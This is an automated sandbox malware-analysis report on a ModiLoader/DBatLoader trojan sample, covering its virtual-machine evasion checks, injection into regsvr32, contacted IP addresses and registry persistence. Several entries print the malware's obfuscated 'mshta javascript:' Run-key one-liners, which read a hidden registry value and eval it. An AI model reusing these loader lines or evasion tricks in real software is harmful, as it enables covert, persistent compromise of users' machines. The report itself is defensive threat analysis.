Malware Analysis Report

2024-10-23 19:35

Sample ID 240505-tfgfbshe49
Target 1861f5f5c1bf4c6eabe0b6fc8d792019_JaffaCakes118
SHA256 f12851c350ac9d71760465bfe01bc7e17f3dd2575412d99865cde1bbdf16d353
Tags
modiloader evasion persistence trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

f12851c350ac9d71760465bfe01bc7e17f3dd2575412d99865cde1bbdf16d353

Threat Level: Known bad

The file 1861f5f5c1bf4c6eabe0b6fc8d792019_JaffaCakes118 was found to be: Known bad.

Malicious Activity Summary

modiloader evasion persistence trojan

ModiLoader, DBatLoader

Looks for VirtualBox Guest Additions in registry

ModiLoader Second Stage

Checks for common network interception software

Looks for VMWare Tools registry key

Adds policy Run key to start application

Checks BIOS information in registry

Deletes itself

Adds Run key to start application

Maps connected drives based on registry

Unsigned PE

Suspicious behavior: MapViewOfSection

Suspicious behavior: EnumeratesProcesses

Modifies Internet Explorer settings

Suspicious use of WriteProcessMemory

Suspicious use of AdjustPrivilegeToken

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-05-05 15:59

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-05-05 15:59

Reported

2024-05-05 16:02

Platform

win7-20240221-en

Max time kernel

150s

Max time network

153s

Command Line

"C:\Users\Admin\AppData\Local\Temp\1861f5f5c1bf4c6eabe0b6fc8d792019_JaffaCakes118.exe"

Signatures

ModiLoader, DBatLoader

trojan modiloader

Checks for common network interception software

evasion

Looks for VirtualBox Guest Additions in registry

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Oracle\VirtualBox Guest Additions C:\Windows\SysWOW64\regsvr32.exe N/A

ModiLoader Second Stage

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Adds policy Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\ = "mshta javascript:PsA8xjRa=\"cck5GvZ\";G03U=new%20ActiveXObject(\"WScript.Shell\");sYyg8JvGW=\"EtR0apx6to\";e3Q8vT=G03U.RegRead(\"HKLM\\\\software\\\\Wow6432Node\\\\9e4ab122db\\\\a90a5c2c\");p1VOGEMz=\"0TKUsc6\";eval(e3Q8vT);Ol21kIDT=\"6AdNYwT2\";" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run C:\Windows\SysWOW64\regsvr32.exe N/A

Looks for VMWare Tools registry key

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\VMware, Inc.\VMware Tools C:\Windows\SysWOW64\regsvr32.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Windows\SysWOW64\regsvr32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Windows\SysWOW64\regsvr32.exe N/A

Deletes itself

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\ = "mshta javascript:xzNVCR5=\"04vllgF19c\";wa08=new%20ActiveXObject(\"WScript.Shell\");rH0i2VfpNH=\"YajvegY\";nmU3R3=wa08.RegRead(\"HKLM\\\\software\\\\Wow6432Node\\\\9e4ab122db\\\\a90a5c2c\");Dg0QPofg=\"YvGkS\";eval(nmU3R3);k3TtIGC=\"rH\";" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Windows\CurrentVersion\Run\ = "mshta javascript:p8sENf3O=\"vTTzJsID9\";K05g=new%20ActiveXObject(\"WScript.Shell\");krl8KES=\"wrnL3VDldN\";wF8nt=K05g.RegRead(\"HKCU\\\\software\\\\9e4ab122db\\\\a90a5c2c\");QOVKp3pE=\"fP7at634MA\";eval(wF8nt);guU7kjI=\"z5sDzbp\";" C:\Windows\SysWOW64\regsvr32.exe N/A

Maps connected drives based on registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum C:\Windows\SysWOW64\regsvr32.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0 C:\Windows\SysWOW64\regsvr32.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_BROWSER_EMULATION\regsvr32.exe = "0" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_BROWSER_EMULATION\iexplore.exe = "0" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\International C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\regsvr32.exe = "0" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\iexplore.exe = "0" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION C:\Windows\SysWOW64\regsvr32.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1084 wrote to memory of 2436 N/A C:\Users\Admin\AppData\Local\Temp\1861f5f5c1bf4c6eabe0b6fc8d792019_JaffaCakes118.exe C:\Windows\SysWOW64\regsvr32.exe
PID 1084 wrote to memory of 2436 N/A C:\Users\Admin\AppData\Local\Temp\1861f5f5c1bf4c6eabe0b6fc8d792019_JaffaCakes118.exe C:\Windows\SysWOW64\regsvr32.exe
PID 1084 wrote to memory of 2436 N/A C:\Users\Admin\AppData\Local\Temp\1861f5f5c1bf4c6eabe0b6fc8d792019_JaffaCakes118.exe C:\Windows\SysWOW64\regsvr32.exe
PID 1084 wrote to memory of 2436 N/A C:\Users\Admin\AppData\Local\Temp\1861f5f5c1bf4c6eabe0b6fc8d792019_JaffaCakes118.exe C:\Windows\SysWOW64\regsvr32.exe
PID 1084 wrote to memory of 2436 N/A C:\Users\Admin\AppData\Local\Temp\1861f5f5c1bf4c6eabe0b6fc8d792019_JaffaCakes118.exe C:\Windows\SysWOW64\regsvr32.exe
PID 1084 wrote to memory of 2436 N/A C:\Users\Admin\AppData\Local\Temp\1861f5f5c1bf4c6eabe0b6fc8d792019_JaffaCakes118.exe C:\Windows\SysWOW64\regsvr32.exe
PID 1084 wrote to memory of 2436 N/A C:\Users\Admin\AppData\Local\Temp\1861f5f5c1bf4c6eabe0b6fc8d792019_JaffaCakes118.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2436 wrote to memory of 2700 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2436 wrote to memory of 2700 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2436 wrote to memory of 2700 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2436 wrote to memory of 2700 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2436 wrote to memory of 2700 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2436 wrote to memory of 2700 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2436 wrote to memory of 2700 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2700 wrote to memory of 2360 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2700 wrote to memory of 2360 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2700 wrote to memory of 2360 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2700 wrote to memory of 2360 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2700 wrote to memory of 2360 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2700 wrote to memory of 2360 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2700 wrote to memory of 2360 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2700 wrote to memory of 552 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2700 wrote to memory of 552 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2700 wrote to memory of 552 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2700 wrote to memory of 552 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2700 wrote to memory of 552 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2700 wrote to memory of 552 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2700 wrote to memory of 552 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe

Processes

C:\Users\Admin\AppData\Local\Temp\1861f5f5c1bf4c6eabe0b6fc8d792019_JaffaCakes118.exe

"C:\Users\Admin\AppData\Local\Temp\1861f5f5c1bf4c6eabe0b6fc8d792019_JaffaCakes118.exe"

C:\Windows\SysWOW64\regsvr32.exe

regsvr32.exe

C:\Windows\SysWOW64\regsvr32.exe

regsvr32.exe

C:\Windows\SysWOW64\regsvr32.exe

"C:\Windows\SysWOW64\regsvr32.exe"

C:\Windows\SysWOW64\regsvr32.exe

"C:\Windows\SysWOW64\regsvr32.exe"

Network

Country Destination Domain Proto
AU 16.50.180.48:80 tcp
FR 89.234.158.153:80 tcp
US 117.51.92.22:80 tcp
US 24.248.152.96:80 tcp
KE 197.182.9.131:80 tcp
JP 133.156.68.93:80 tcp
BR 179.218.219.214:80 tcp
MA 160.168.129.9:80 tcp
TW 111.240.154.58:80 tcp
PL 89.73.180.35:80 tcp
US 11.52.35.65:80 tcp
CN 121.35.86.200:80 tcp
CN 49.234.140.54:80 tcp
CN 183.70.179.118:80 tcp
SE 93.182.142.185:80 tcp
MU 165.55.90.111:80 tcp
TR 83.66.19.60:8080 tcp
SG 8.174.253.40:80 tcp
US 173.117.42.23:80 tcp
AR 181.91.131.210:80 tcp
KR 39.121.130.196:80 tcp
ZA 197.84.49.155:80 tcp
US 6.218.141.68:80 tcp
US 214.29.217.165:80 tcp
CN 111.121.244.65:80 tcp
CN 36.219.205.40:80 tcp
US 52.252.160.75:443 tcp
US 154.17.109.222:80 tcp
US 173.69.99.90:443 tcp
BR 187.40.100.182:80 tcp
US 216.79.33.214:443 tcp
JP 121.93.30.187:80 tcp
SE 159.107.50.58:80 tcp
CN 113.222.148.120:80 tcp
DZ 154.246.233.43:80 tcp
US 204.165.16.131:443 tcp
US 104.212.254.6:80 tcp
KR 223.165.159.20:443 tcp
EG 197.124.29.213:80 tcp
US 140.175.94.19:80 tcp
US 174.138.66.253:80 tcp
US 163.205.135.168:80 tcp
US 174.138.66.253:80 174.138.66.253 tcp
KR 203.247.201.90:80 tcp
CN 117.42.22.75:80 tcp
US 30.23.74.192:80 tcp
US 33.42.180.149:80 tcp
CA 184.107.39.173:80 tcp
ZA 102.255.235.145:8080 tcp
GB 86.53.248.96:80 tcp
CN 119.139.185.174:80 tcp
BR 189.99.61.73:80 tcp
US 48.60.159.175:80 tcp
FR 130.84.53.39:80 tcp
PL 46.113.64.222:80 tcp
US 199.18.193.199:80 tcp
DE 62.8.129.151:80 tcp
IN 59.93.207.58:80 tcp
TR 31.206.141.74:80 tcp
US 38.234.69.201:80 tcp
GB 163.1.215.129:80 tcp
CN 112.113.51.162:80 tcp
DE 141.69.158.76:443 tcp
SA 144.86.88.119:80 tcp
US 21.22.233.19:80 tcp
US 30.153.95.222:80 tcp
US 129.170.227.158:80 tcp
CN 171.219.179.231:80 tcp
US 156.152.190.110:80 tcp
FR 4.176.13.65:8080 tcp
US 134.129.131.46:80 tcp
DE 87.149.7.227:80 tcp
AR 186.100.60.196:443 tcp
CN 171.208.52.210:80 tcp
NO 62.16.202.225:80 tcp
US 73.189.92.165:80 tcp
CA 184.163.91.212:80 tcp
JP 150.42.89.232:80 tcp
US 69.78.33.138:80 tcp
US 44.95.192.61:80 tcp
IE 87.46.207.111:80 tcp
US 66.221.191.197:80 tcp
US 21.139.230.90:8080 tcp
CZ 104.64.120.251:80 tcp
CN 218.94.160.116:80 tcp
US 151.113.81.13:80 tcp
CI 41.206.236.181:80 tcp
MA 196.78.185.35:443 tcp
US 66.252.221.233:80 tcp
US 129.52.232.255:80 tcp
US 63.233.183.228:80 tcp
BR 45.181.119.123:80 tcp
US 38.115.131.82:80 tcp
N/A 10.24.100.193:80 tcp
FR 212.208.85.29:80 tcp
CN 47.116.29.110:80 tcp
ZA 41.4.109.83:80 tcp
US 33.82.181.191:80 tcp
SG 43.34.51.199:80 tcp
US 173.68.181.240:80 tcp
SA 100.227.128.223:80 tcp
IT 130.136.219.225:8080 tcp
US 98.29.182.174:80 tcp
DE 134.130.12.247:8080 tcp
US 7.95.127.203:80 tcp
AU 1.144.36.101:443 tcp
CA 132.215.171.53:80 tcp
US 128.181.152.99:80 tcp
JP 61.204.74.184:80 tcp
US 52.249.149.239:80 tcp
US 44.170.203.167:80 tcp
US 26.27.140.57:443 tcp
JP 203.165.248.247:443 tcp
KE 102.7.190.153:443 tcp
CA 131.140.25.5:80 tcp
CM 102.244.81.127:80 tcp
AR 186.127.115.102:80 tcp
US 9.253.169.40:80 tcp
MX 201.113.79.228:8080 tcp
US 199.188.28.158:80 tcp
PT 94.133.231.139:80 tcp
CN 61.190.172.167:80 tcp
GB 51.246.221.57:80 tcp
US 136.112.82.86:80 tcp
PL 213.25.250.11:80 tcp
CN 202.5.212.10:80 tcp
N/A 127.215.237.6:80 tcp
US 108.4.214.37:80 tcp
US 99.75.56.202:80 tcp
TW 140.117.239.3:80 tcp
AU 58.169.153.163:80 tcp
US 56.60.35.232:80 tcp
US 66.224.119.141:80 tcp
N/A 10.40.172.123:80 tcp
US 50.46.234.222:80 tcp
KR 115.14.35.213:80 tcp
BY 178.123.10.3:80 tcp
US 158.61.1.138:80 tcp
GB 47.67.37.136:80 tcp
CN 123.149.156.121:80 tcp
US 48.101.109.2:80 tcp
US 16.117.92.127:80 tcp
US 148.78.239.167:80 tcp
BR 187.87.94.181:80 tcp
CN 180.178.200.60:80 tcp
US 56.236.212.29:80 tcp
GB 18.168.206.39:80 tcp
BR 201.41.221.235:80 tcp
TW 34.80.210.46:80 tcp
US 166.228.100.107:443 tcp
US 21.182.178.252:443 tcp
GB 137.105.213.146:80 tcp
FR 92.165.228.157:443 tcp
US 63.100.153.103:80 tcp
CN 117.146.112.10:80 tcp
US 99.30.22.63:80 tcp
US 214.253.46.50:80 tcp
CN 116.63.254.48:80 tcp
US 149.42.87.9:80 tcp
JP 116.223.179.240:443 tcp
RU 2.92.249.218:80 tcp
BR 206.43.53.167:80 tcp
ES 212.145.148.107:80 tcp
US 68.14.131.44:8080 tcp
US 184.53.162.181:80 tcp
KZ 5.34.24.157:80 tcp
GB 95.131.81.218:80 tcp
N/A 8.232.47.86:80 tcp

Files

memory/1084-0-0x0000000002590000-0x0000000002690000-memory.dmp

memory/1084-1-0x0000000000280000-0x0000000000281000-memory.dmp

memory/1084-2-0x0000000000280000-0x0000000000281000-memory.dmp

memory/1084-3-0x0000000002590000-0x0000000002690000-memory.dmp

memory/1084-4-0x0000000000400000-0x0000000000484000-memory.dmp

memory/1084-8-0x0000000000050000-0x000000000011C000-memory.dmp

memory/1084-10-0x0000000000050000-0x000000000011C000-memory.dmp

memory/1084-7-0x0000000000050000-0x000000000011C000-memory.dmp

memory/1084-9-0x0000000000050000-0x000000000011C000-memory.dmp

memory/1084-6-0x0000000000050000-0x000000000011C000-memory.dmp

memory/2436-16-0x00000000007B0000-0x00000000007B7000-memory.dmp

memory/1084-11-0x0000000000050000-0x000000000011C000-memory.dmp

memory/1084-18-0x0000000000400000-0x0000000000484000-memory.dmp

memory/2436-20-0x00000000007B0000-0x00000000007B7000-memory.dmp

memory/2436-21-0x00000000000D0000-0x000000000019C000-memory.dmp

memory/2436-23-0x00000000000D0000-0x000000000019C000-memory.dmp

memory/2436-25-0x00000000000D0000-0x000000000019C000-memory.dmp

memory/2436-22-0x00000000000D0000-0x000000000019C000-memory.dmp

memory/2436-24-0x00000000000D0000-0x000000000019C000-memory.dmp

memory/2436-26-0x00000000000D0000-0x000000000019C000-memory.dmp

memory/2700-33-0x00000000007B0000-0x00000000007B7000-memory.dmp

memory/2700-31-0x00000000007B0000-0x00000000007B7000-memory.dmp

memory/2700-36-0x0000000000110000-0x00000000001DC000-memory.dmp

memory/2700-37-0x0000000000110000-0x00000000001DC000-memory.dmp

memory/2700-41-0x0000000000110000-0x00000000001DC000-memory.dmp

memory/2700-40-0x0000000000110000-0x00000000001DC000-memory.dmp

memory/2700-39-0x0000000000110000-0x00000000001DC000-memory.dmp

memory/2700-38-0x0000000000110000-0x00000000001DC000-memory.dmp

memory/2700-42-0x0000000000110000-0x00000000001DC000-memory.dmp

memory/2700-43-0x0000000000110000-0x00000000001DC000-memory.dmp

memory/2700-48-0x0000000000110000-0x00000000001DC000-memory.dmp

memory/2700-47-0x0000000000110000-0x00000000001DC000-memory.dmp

memory/2700-46-0x0000000000110000-0x00000000001DC000-memory.dmp

memory/2700-45-0x0000000000110000-0x00000000001DC000-memory.dmp

memory/2700-44-0x0000000000110000-0x00000000001DC000-memory.dmp

memory/2700-49-0x0000000000110000-0x00000000001DC000-memory.dmp

memory/2700-50-0x0000000000110000-0x00000000001DC000-memory.dmp

memory/2360-51-0x00000000007B0000-0x00000000007B7000-memory.dmp

memory/2360-53-0x00000000007B0000-0x00000000007B7000-memory.dmp

memory/2360-54-0x00000000001E0000-0x00000000002AC000-memory.dmp

memory/2360-55-0x00000000001E0000-0x00000000002AC000-memory.dmp

memory/2360-59-0x00000000001E0000-0x00000000002AC000-memory.dmp

memory/2360-58-0x00000000001E0000-0x00000000002AC000-memory.dmp

memory/2360-56-0x00000000001E0000-0x00000000002AC000-memory.dmp

memory/2700-60-0x0000000000110000-0x00000000001DC000-memory.dmp

memory/2700-61-0x0000000000110000-0x00000000001DC000-memory.dmp

memory/552-65-0x0000000000270000-0x000000000033C000-memory.dmp

memory/552-68-0x0000000000270000-0x000000000033C000-memory.dmp

memory/552-67-0x0000000000270000-0x000000000033C000-memory.dmp

memory/552-66-0x0000000000270000-0x000000000033C000-memory.dmp

memory/552-69-0x0000000000270000-0x000000000033C000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-05-05 15:59

Reported

2024-05-05 16:02

Platform

win10v2004-20240419-en

Max time kernel

149s

Max time network

150s

Command Line

"C:\Users\Admin\AppData\Local\Temp\1861f5f5c1bf4c6eabe0b6fc8d792019_JaffaCakes118.exe"

Signatures

ModiLoader, DBatLoader

trojan modiloader

Checks for common network interception software

evasion

Looks for VirtualBox Guest Additions in registry

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Oracle\VirtualBox Guest Additions C:\Windows\SysWOW64\regsvr32.exe N/A

ModiLoader Second Stage

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Adds policy Run key to start application

persistence
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\ = "mshta javascript:nyARd0KG=\"CAHi53qt\";KT3=new%20ActiveXObject(\"WScript.Shell\");GqX4iq9zCb=\"CIri6UXbqC\";GJu5j=KT3.RegRead(\"HKLM\\\\software\\\\Wow6432Node\\\\ae1eb04480\\\\cc0542a5\");Rt9QmSux=\"MQkq\";eval(GJu5j);M77HvldS=\"FWO\";" C:\Windows\SysWOW64\regsvr32.exe N/A

Looks for VMWare Tools registry key

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\VMware, Inc.\VMware Tools C:\Windows\SysWOW64\regsvr32.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Windows\SysWOW64\regsvr32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Windows\SysWOW64\regsvr32.exe N/A

Deletes itself

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\ = "mshta javascript:OA6nrMby=\"uoj\";c0Q2=new%20ActiveXObject(\"WScript.Shell\");u4mzMsS8=\"fADfGyl\";hR97UD=c0Q2.RegRead(\"HKLM\\\\software\\\\Wow6432Node\\\\ae1eb04480\\\\cc0542a5\");bP0JSC1kK=\"lyUZ\";eval(hR97UD);wWZ3YAS=\"iBLeq\";" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2860750803-256193626-1801997576-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ = "mshta javascript:LewS8J2Lwj=\"lAE7IR\";dH8=new%20ActiveXObject(\"WScript.Shell\");OiFa7Sl=\"q4KVbB\";vDN1e=dH8.RegRead(\"HKCU\\\\software\\\\ae1eb04480\\\\cc0542a5\");CKcoG8hGW=\"x\";eval(vDN1e);btt7OVV1C=\"c\";" C:\Windows\SysWOW64\regsvr32.exe N/A

Maps connected drives based on registry

Description Indicator Process Target
